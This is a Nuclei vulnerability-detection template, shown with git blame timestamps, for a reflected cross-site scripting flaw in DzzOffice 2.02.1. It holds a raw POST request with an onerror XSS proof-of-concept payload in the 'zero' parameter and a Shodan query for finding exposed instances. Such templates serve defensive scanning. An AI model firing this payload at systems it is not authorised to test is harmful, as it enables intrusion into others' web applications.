nuclei-templates/vulnerabilities/other/dzzoffice-xss.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-12 18:11:26 +00:00
id: dzzoffice-xss
info:
name: Dzzoffice 2.02.1_SC_UTF8 - Cross-Site Scripting
2022-08-12 18:11:26 +00:00
author: arafatansari
severity: medium
description: |
2022-08-12 19:07:24 +00:00
A XSS vulnerability was discovered in dzzoffice 2.02.1_SC_UTF8, There is a Reflected XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the zero parameter.
2022-08-12 18:11:26 +00:00
reference:
- https://github.com/zyx0814/dzzoffice/issues/183
metadata:
2022-08-12 19:07:24 +00:00
verified: true
2022-08-12 18:11:26 +00:00
shodan-query: http.html:"dzzoffice"
2022-08-12 19:07:24 +00:00
tags: dzzoffice,xss
2022-08-12 18:11:26 +00:00
requests:
- raw:
- |
POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2022-08-12 19:07:24 +00:00
id=%23&nouser=0&moderator=0&zero=<img+src=x+onerror=alert(document.domain)>&stype=0&range=0&showjob=0
2022-08-12 18:11:26 +00:00
matchers-condition: and
matchers:
2022-08-12 19:07:24 +00:00
- type: word
words:
- '"text":"<img src=x onerror=alert(document.domain)>'
2022-08-12 18:11:26 +00:00
- type: word
2022-08-12 19:07:24 +00:00
part: header
2022-08-12 18:11:26 +00:00
words:
2022-08-12 19:07:24 +00:00
- text/html
- type: status
status:
- 200